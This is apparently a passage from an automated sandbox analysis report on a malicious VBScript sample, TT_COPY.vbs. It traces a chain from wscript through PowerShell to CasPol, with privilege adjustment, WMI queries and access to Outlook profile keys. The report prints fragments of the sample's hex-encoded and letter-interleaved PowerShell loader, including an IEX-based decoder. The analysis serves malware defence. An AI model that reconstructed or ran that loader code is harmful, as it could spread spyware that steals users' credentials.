'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AAB6 AdjustTokenPrivileges,7_2_1D45AAB6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AA7F AdjustTokenPrivileges,7_2_1D45AA7F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai3mehq5.lyv.ps1Jump to behavior
          Source: classification engineClassification label: mal96.troj.spyw.evad.winVBS@7/4@2/2
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:304:WilStaging_02
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF825BB00BD pushad ; iretd 2_2_00007FF825BB00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF825BB0428 push E95D2E73h; ret 2_2_00007FF825BB0459
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC6629 push ss; retf 0000h7_2_00CC662A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC6638 push ss; retf 0000h7_2_00CC667A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00DAC431 push 00000039h; ret 7_2_00DAC434
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D452551 pushfd ; ret 7_2_1D45255A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D453450 push edx; ret 7_2_1D453462
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45255D push esp; ret 7_2_1D452566
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D453168 push 8140738Fh; ret 7_2_1D45320A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45343D push esi; ret 7_2_1D45343E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D4533C2 push edi; ret 7_2_1D4533D2
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D4524DC push esp; ret 7_2_1D452566
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D4526F8 push esp; ret 7_2_1D45276A
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
